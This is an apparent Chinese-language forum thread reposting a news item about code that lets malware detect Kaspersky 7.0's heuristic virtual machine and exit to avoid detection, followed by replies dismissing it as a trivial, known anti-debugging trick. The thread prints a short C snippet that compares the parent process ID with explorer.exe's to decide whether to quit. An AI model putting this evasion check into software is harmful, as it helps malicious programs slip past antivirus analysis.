【新闻】卡巴最新高级虚拟机启发式查毒技术被中国黑客攻破
11 月9日,中国著名黑客xyzreg(著名的安全漏洞、安全软件研究者,曾在中国安全第一峰会 -- 安全焦点2007峰会上做新型恶意软件技术相关的议题演讲,演讲中演示了如何穿透卡巴斯基、诺顿、Mcafee等安全软件的主动防御体系等内容)在其 BLOG上发表了一篇如何攻破卡巴斯基7.0的 “新型高级虚拟机启发式查毒技术”的文章,并提供了相应代码。代码可以检测恶意程序自身是否在卡巴斯基7.0的虚拟机中运行,如果发现被卡巴斯基的虚拟机运行,则自动退出,从而使卡巴斯基无法发现程序中包含的恶意代码。
被我十几行代码就咔嚓了,而且还没用奇技淫巧,呵呵:
DWORD fpid,epid;
void VMM()
{
PROCESSENTRY32 pe;
HANDLE hkz=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
pe.dwSize=sizeof(PROCESSENTRY32);
if (Process32First(hkz,&pe))
{
do
{
if (pe.th32ProcessID==GetCurrentProcessId())
{
fpid=pe.th32ParentProcessID;
}
if (stricmp(pe.szExeFile,"explorer.exe")==0)
{
epid=pe.th32ProcessID;
}
}
while(Process32Next(hkz,&pe));
}
}
主函数里:
VMM();
if(fpid!=epid)
return 0; 有些牛人很张扬,有些牛人不张扬:D 呵呵,这有啥值得炫耀的,检测是否被资源管理器加载这经常被用到反调试器的代码中 高人一般都隐的比较深
不会这样暴露自己的
只有这种人爱显摆自己 代码很简单 有的人喜欢晒,有的人不喜欢晒。:D 性格和追求不同。 这好像不算攻破吧,
他检测出来了就直接推出那他病毒自己也没有发挥作用啊
应该是明知有卡巴虚拟机什么的照运行不误才叫攻破吧 这叫攻破?哈哈,既然病毒不运行就等于是僵尸而已,不算啥
页:
[1]